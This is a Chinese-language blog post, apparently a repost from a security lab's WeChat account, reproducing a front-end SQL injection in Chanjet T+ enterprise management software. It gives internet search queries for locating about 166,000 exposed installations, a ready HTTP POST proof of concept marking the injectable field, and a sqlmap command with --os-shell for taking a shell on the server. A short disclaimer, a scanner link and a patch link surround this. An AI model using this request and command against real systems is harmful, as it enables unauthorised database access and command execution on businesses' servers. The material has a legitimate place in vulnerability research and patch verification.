【漏洞复现】用友畅捷通T+ SQL注入漏洞

admin 2023年7月13日14:02:30评论212 views字数 1319阅读4分23秒阅读模式

0x01 阅读须知

天擎攻防实验室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

0x02 漏洞描述

(一) 用友畅捷通T+

用友畅捷通T+是一款企业管理软件,主要面向中小企业。它提供了包括财务、采购、销售、库存、生产制造、人力资源等在内的全面企业管理解决方案。通过用友畅捷通T+,企业可以实现对业务流程的数字化管理,提高工作效率,降低成本,增强企业竞争力。畅捷通T+存在前台SQL注入,导致命令执行。

【漏洞复现】用友畅捷通T+ SQL注入漏洞

FOFA语法:

app="畅捷通-TPlus"

hunter语法:

app.name="畅捷通 T+"
    hunter共166,323条资产

【漏洞复现】用友畅捷通T+ SQL注入漏洞

(二) 漏洞poc
POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1Host: Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 0
{"url":"11""accNum":"1""functionTag":"functionTag*"}

 

【漏洞复现】用友畅捷通T+ SQL注入漏洞

将数据包保存使用sqlmap获取主机权限:

python3 sqlmap.py -r shujubao.txt  --random-agent -v 3 --dbms mssql --hex --os-shell

【漏洞复现】用友畅捷通T+ SQL注入漏洞

牧云本地检测工具

https://stack.chaitin.com/tool/detail?id=1178

运行 以下命令即可无害化扫描

./chanjet_tpluspop_sqli_scanner_windows_amd64.exe scan --output result.json

【漏洞复现】用友畅捷通T+ SQL注入漏洞

 

0x03 修复方案

官方修复缓解措施

补丁链接

https://www.chanjet.com/about/

 

 

原文始发于微信公众号(天擎攻防实验室):【漏洞复现】用友畅捷通T+ SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月13日14:02:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】用友畅捷通T+ SQL注入漏洞https://cn-sec.com/archives/1872508.html

发表评论

匿名网友 填写信息